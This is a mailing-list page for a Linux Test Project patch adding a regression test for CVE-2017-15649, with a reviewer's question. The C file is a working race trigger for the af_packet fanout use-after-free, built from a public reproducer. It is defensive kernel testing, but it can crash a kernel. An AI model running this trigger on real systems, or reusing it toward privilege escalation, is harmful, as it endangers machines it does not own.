[v3] Add a regression test for cve-2017-15649
diff mbox series

Message ID 20200130092106.4217-1-mmoese@suse.de
State New
Headers show
Series
  • [v3] Add a regression test for cve-2017-15649
Related show

Commit Message

Michael Moese Jan. 30, 2020, 9:21 a.m. UTC
net/packet/af_packet.c in the Linux kernel before 4.13.6 allows local
users to gain privileges via crafted system calls that trigger
mishandling of packet_fanout data structures, because of a race
condition (involving fanout_add and packet_do_bind) that leads to a
use-after-free.

See https://ssd-disclosure.com/archives/3484 for more detail.

Signed-off-by: Michael Moese <mmoese@suse.de>

--
Changes to v2:
  - add tags to struct tst_test

Changes to v1:
  - reworked the usage of fuzzy sync library so this should now be
    correct
  - use LTP library functions for file I/O
  - require KASAN to be enabled
---
 runtest/cve                    |   2 +-
 testcases/cve/.gitignore       |   1 +
 testcases/cve/Makefile         |   1 +
 testcases/cve/cve-2017-15649.c | 140 +++++++++++++++++++++++++++++++++
 4 files changed, 143 insertions(+), 1 deletion(-)
 create mode 100644 testcases/cve/cve-2017-15649.c

Comments

Xiao Yang Jan. 30, 2020, 9:56 a.m. UTC | #1
On 1/30/20 5:21 PM, Michael Moese wrote:
> net/packet/af_packet.c in the Linux kernel before 4.13.6 allows local
> users to gain privileges via crafted system calls that trigger
> mishandling of packet_fanout data structures, because of a race
> condition (involving fanout_add and packet_do_bind) that leads to a
> use-after-free.
>
> See https://ssd-disclosure.com/archives/3484 for more detail.
>
> Signed-off-by: Michael Moese <mmoese@suse.de>
>
> --
> Changes to v2:
>    - add tags to struct tst_test
>
> Changes to v1:
>    - reworked the usage of fuzzy sync library so this should now be
>      correct
>    - use LTP library functions for file I/O
>    - require KASAN to be enabled
> ---
>   runtest/cve                    |   2 +-
>   testcases/cve/.gitignore       |   1 +
>   testcases/cve/Makefile         |   1 +
>   testcases/cve/cve-2017-15649.c | 140 +++++++++++++++++++++++++++++++++
>   4 files changed, 143 insertions(+), 1 deletion(-)
>   create mode 100644 testcases/cve/cve-2017-15649.c
>
> diff --git a/runtest/cve b/runtest/cve
> index 57cf66075..b76ddaaaa 100644
> --- a/runtest/cve
> +++ b/runtest/cve
> @@ -24,7 +24,7 @@ cve-2017-12193 add_key04
>   cve-2017-15274 add_key02
>   cve-2017-15299 request_key03 -b cve-2017-15299
>   cve-2017-15537 ptrace07
> -cve-2017-15649 fanout01
> +cve-2017-15649 cve-2017-15649

Hi,

I wonder if fanout01 cannot trigger cve-2017-15649 reliably?

Best Regards,

Xiao Yang

>   cve-2017-15951 request_key03 -b cve-2017-15951
>   cve-2017-17805 af_alg02
>   cve-2017-17806 af_alg01
> diff --git a/testcases/cve/.gitignore b/testcases/cve/.gitignore
> index 01a3e4c8f..08154e2db 100644
> --- a/testcases/cve/.gitignore
> +++ b/testcases/cve/.gitignore
> @@ -8,5 +8,6 @@ cve-2017-2671
>   meltdown
>   stack_clash
>   cve-2017-17052
> +cve-2017-15649
>   cve-2017-16939
>   cve-2017-17053
> diff --git a/testcases/cve/Makefile b/testcases/cve/Makefile
> index da44fff60..6cf3b5af9 100644
> --- a/testcases/cve/Makefile
> +++ b/testcases/cve/Makefile
> @@ -46,5 +46,6 @@ cve-2017-17052:	CFLAGS += -pthread
>   cve-2017-17053:	CFLAGS += -pthread
>   
>   cve-2015-3290:	CFLAGS += -pthread
> +cve-2017-15649: CFLAGS += -pthread
>   
>   include $(top_srcdir)/include/mk/generic_leaf_target.mk
> diff --git a/testcases/cve/cve-2017-15649.c b/testcases/cve/cve-2017-15649.c
> new file mode 100644
> index 000000000..0bbcb6eba
> --- /dev/null
> +++ b/testcases/cve/cve-2017-15649.c
> @@ -0,0 +1,140 @@
> +// SPDX-License-Identifier: GPL-2.0-or-later
> +/*
> + *   Copyright (c) 2019 Michael Moese <mmoese@suse.com>
> + */
> +/* Regression test for CVE-2017-15649
> + * based on the reproducer at https://ssd-disclosure.com/archives/3484
> + *
> + * net/packet/af_packet.c in the Linux kernel before 4.13.6 allows local users
> + * to gain privileges via crafted system calls that trigger mishandling of
> + * packet_fanout data structures, because of a race condition (involving
> + * fanout_add and packet_do_bind) that leads to a use-after-free.
> + *
> + * Be careful! This test may crash your kernel!
> + */
> +
> +#include <pthread.h>
> +#include <stdio.h>
> +#include <sched.h>
> +#include <string.h>
> +#include <time.h>
> +#include <net/if.h>
> +#include <sched.h>
> +#include <sys/types.h>
> +#include <sys/socket.h>
> +
> +#include "tst_test.h"
> +#include "tst_taint.h"
> +#include "tst_safe_pthread.h"
> +#include "tst_fuzzy_sync.h"
> +#include "tst_capability.h"
> +#include "lapi/syscalls.h"
> +
> +static struct tst_fzsync_pair fzsync_pair;
> +
> +static int fd;
> +static struct ifreq ifr;
> +
> +struct sockaddr_ll {
> +	unsigned short	sll_family;
> +	short		sll_protocol;
> +	int		sll_ifindex;
> +	unsigned short	sll_hatype;
> +	unsigned char	sll_pkttype;
> +	unsigned char	sll_halen;
> +	unsigned char	sll_addr[8];
> +};
> +static struct sockaddr_ll addr;
> +
> +void *bind_fn(void *unused)
> +{
> +	while (tst_fzsync_run_b(&fzsync_pair)) {
> +		tst_fzsync_start_race_b(&fzsync_pair);
> +		bind(fd, (struct sockaddr *)&addr, sizeof(addr));
> +		tst_fzsync_end_race_b(&fzsync_pair);
> +	}
> +	return unused;
> +}
> +
> +static void setup(void)
> +{
> +	int real_uid = getuid();
> +	int real_gid = getgid();
> +	int index;
> +
> +	tst_fzsync_pair_init(&fzsync_pair);
> +	tst_taint_init(TST_TAINT_W | TST_TAINT_D | TST_TAINT_L);
> +
> +	if (unshare(CLONE_NEWUSER) != 0)
> +		tst_brk(TBROK | TTERRNO, "unshare(CLONE_NEWUSER) failed");
> +
> +	if (unshare(CLONE_NEWNET) != 0)
> +		tst_brk(TBROK | TTERRNO, "unshare(CLONE_NEWUSER) failed");
> +
> +	SAFE_FILE_PRINTF("/proc/self/setgroups", "deny");
> +	SAFE_FILE_PRINTF("/proc/self/uid_map", "0 %d 1\n", real_uid);
> +	SAFE_FILE_PRINTF("/proc/self/gid_map", "0 %d 1\n", real_gid);
> +
> +	fd = SAFE_SOCKET(AF_PACKET, SOCK_RAW, PF_PACKET);
> +
> +	strcpy((char *) &ifr.ifr_name, "lo");
> +	SAFE_IOCTL(fd, SIOCGIFINDEX, &ifr);
> +	index = ifr.ifr_ifindex;
> +
> +	SAFE_IOCTL(fd, SIOCGIFFLAGS, &ifr);
> +	ifr.ifr_flags &= ~(short) IFF_UP;
> +
> +	SAFE_IOCTL(fd, SIOCSIFFLAGS, &ifr);
> +
> +	addr.sll_family = AF_PACKET;
> +	addr.sll_protocol = 0x0;
> +	addr.sll_ifindex = index;
> +}
> +
> +static void cleanup(void)
> +{
> +	tst_fzsync_pair_cleanup(&fzsync_pair);
> +	SAFE_CLOSE(fd);
> +}
> +
> +static void run(void)
> +{
> +	int fanout = 0x3;
> +
> +	tst_fzsync_pair_reset(&fzsync_pair, bind_fn);
> +
> +	while (tst_fzsync_run_a(&fzsync_pair)) {
> +		tst_fzsync_start_race_a(&fzsync_pair);
> +		setsockopt(fd, 0x107, 18, &fanout, sizeof(fanout));
> +		tst_fzsync_end_race_a(&fzsync_pair);
> +	}
> +
> +	tst_res(TPASS, "please check for KASAN output");
> +}
> +
> +
> +static const char *kconfigs[] = {
> +	"CONFIG_KASAN",
> +	"CONFIG_USER_NS",
> +	NULL
> +};
> +
> +static struct tst_cap caps[] = {
> +	TST_CAP(TST_CAP_REQ, CAP_SYS_ADMIN),
> +	TST_CAP(TST_CAP_REQ, CAP_NET_RAW),
> +	TST_CAP(TST_CAP_DROP, CAP_SYS_ADMIN),
> +	{},
> +};
> +
> +static struct tst_test test = {
> +	.test_all = run,
> +	.setup = setup,
> +	.cleanup = cleanup,
> +	.needs_kconfigs = kconfigs,
> +	.caps = caps,
> +	.tags = (const struct tst_tag[]) {
> +		{"CVE", "2017-15649"},
> +		{"linux-git", "008ba2a13f2d"},
> +	        {}
> +	}
> +};

Patch
diff mbox series

diff --git a/runtest/cve b/runtest/cve
index 57cf66075..b76ddaaaa 100644
--- a/runtest/cve
+++ b/runtest/cve
@@ -24,7 +24,7 @@  cve-2017-12193 add_key04
 cve-2017-15274 add_key02
 cve-2017-15299 request_key03 -b cve-2017-15299
 cve-2017-15537 ptrace07
-cve-2017-15649 fanout01
+cve-2017-15649 cve-2017-15649
 cve-2017-15951 request_key03 -b cve-2017-15951
 cve-2017-17805 af_alg02
 cve-2017-17806 af_alg01
diff --git a/testcases/cve/.gitignore b/testcases/cve/.gitignore
index 01a3e4c8f..08154e2db 100644
--- a/testcases/cve/.gitignore
+++ b/testcases/cve/.gitignore
@@ -8,5 +8,6 @@  cve-2017-2671
 meltdown
 stack_clash
 cve-2017-17052
+cve-2017-15649
 cve-2017-16939
 cve-2017-17053
diff --git a/testcases/cve/Makefile b/testcases/cve/Makefile
index da44fff60..6cf3b5af9 100644
--- a/testcases/cve/Makefile
+++ b/testcases/cve/Makefile
@@ -46,5 +46,6 @@  cve-2017-17052:	CFLAGS += -pthread
 cve-2017-17053:	CFLAGS += -pthread
 
 cve-2015-3290:	CFLAGS += -pthread
+cve-2017-15649: CFLAGS += -pthread
 
 include $(top_srcdir)/include/mk/generic_leaf_target.mk
diff --git a/testcases/cve/cve-2017-15649.c b/testcases/cve/cve-2017-15649.c
new file mode 100644
index 000000000..0bbcb6eba
--- /dev/null
+++ b/testcases/cve/cve-2017-15649.c
@@ -0,0 +1,140 @@ 
+// SPDX-License-Identifier: GPL-2.0-or-later
+/*
+ *   Copyright (c) 2019 Michael Moese <mmoese@suse.com>
+ */
+/* Regression test for CVE-2017-15649
+ * based on the reproducer at https://ssd-disclosure.com/archives/3484
+ *
+ * net/packet/af_packet.c in the Linux kernel before 4.13.6 allows local users
+ * to gain privileges via crafted system calls that trigger mishandling of
+ * packet_fanout data structures, because of a race condition (involving
+ * fanout_add and packet_do_bind) that leads to a use-after-free.
+ *
+ * Be careful! This test may crash your kernel!
+ */
+
+#include <pthread.h>
+#include <stdio.h>
+#include <sched.h>
+#include <string.h>
+#include <time.h>
+#include <net/if.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+
+#include "tst_test.h"
+#include "tst_taint.h"
+#include "tst_safe_pthread.h"
+#include "tst_fuzzy_sync.h"
+#include "tst_capability.h"
+#include "lapi/syscalls.h"
+
+static struct tst_fzsync_pair fzsync_pair;
+
+static int fd;
+static struct ifreq ifr;
+
+struct sockaddr_ll {
+	unsigned short	sll_family;
+	short		sll_protocol;
+	int		sll_ifindex;
+	unsigned short	sll_hatype;
+	unsigned char	sll_pkttype;
+	unsigned char	sll_halen;
+	unsigned char	sll_addr[8];
+};
+static struct sockaddr_ll addr;
+
+void *bind_fn(void *unused)
+{
+	while (tst_fzsync_run_b(&fzsync_pair)) {
+		tst_fzsync_start_race_b(&fzsync_pair);
+		bind(fd, (struct sockaddr *)&addr, sizeof(addr));
+		tst_fzsync_end_race_b(&fzsync_pair);
+	}
+	return unused;
+}
+
+static void setup(void)
+{
+	int real_uid = getuid();
+	int real_gid = getgid();
+	int index;
+
+	tst_fzsync_pair_init(&fzsync_pair);
+	tst_taint_init(TST_TAINT_W | TST_TAINT_D | TST_TAINT_L);
+
+	if (unshare(CLONE_NEWUSER) != 0)
+		tst_brk(TBROK | TTERRNO, "unshare(CLONE_NEWUSER) failed");
+
+	if (unshare(CLONE_NEWNET) != 0)
+		tst_brk(TBROK | TTERRNO, "unshare(CLONE_NEWUSER) failed");
+
+	SAFE_FILE_PRINTF("/proc/self/setgroups", "deny");
+	SAFE_FILE_PRINTF("/proc/self/uid_map", "0 %d 1\n", real_uid);
+	SAFE_FILE_PRINTF("/proc/self/gid_map", "0 %d 1\n", real_gid);
+
+	fd = SAFE_SOCKET(AF_PACKET, SOCK_RAW, PF_PACKET);
+
+	strcpy((char *) &ifr.ifr_name, "lo");
+	SAFE_IOCTL(fd, SIOCGIFINDEX, &ifr);
+	index = ifr.ifr_ifindex;
+
+	SAFE_IOCTL(fd, SIOCGIFFLAGS, &ifr);
+	ifr.ifr_flags &= ~(short) IFF_UP;
+
+	SAFE_IOCTL(fd, SIOCSIFFLAGS, &ifr);
+
+	addr.sll_family = AF_PACKET;
+	addr.sll_protocol = 0x0;
+	addr.sll_ifindex = index;
+}
+
+static void cleanup(void)
+{
+	tst_fzsync_pair_cleanup(&fzsync_pair);
+	SAFE_CLOSE(fd);
+}
+
+static void run(void)
+{
+	int fanout = 0x3;
+
+	tst_fzsync_pair_reset(&fzsync_pair, bind_fn);
+
+	while (tst_fzsync_run_a(&fzsync_pair)) {
+		tst_fzsync_start_race_a(&fzsync_pair);
+		setsockopt(fd, 0x107, 18, &fanout, sizeof(fanout));
+		tst_fzsync_end_race_a(&fzsync_pair);
+	}
+
+	tst_res(TPASS, "please check for KASAN output");
+}
+
+
+static const char *kconfigs[] = {
+	"CONFIG_KASAN",
+	"CONFIG_USER_NS",
+	NULL
+};
+
+static struct tst_cap caps[] = {
+	TST_CAP(TST_CAP_REQ, CAP_SYS_ADMIN),
+	TST_CAP(TST_CAP_REQ, CAP_NET_RAW),
+	TST_CAP(TST_CAP_DROP, CAP_SYS_ADMIN),
+	{},
+};
+
+static struct tst_test test = {
+	.test_all = run,
+	.setup = setup,
+	.cleanup = cleanup,
+	.needs_kconfigs = kconfigs,
+	.caps = caps,
+	.tags = (const struct tst_tag[]) {
+		{"CVE", "2017-15649"},
+		{"linux-git", "008ba2a13f2d"},
+	        {}
+	}
+};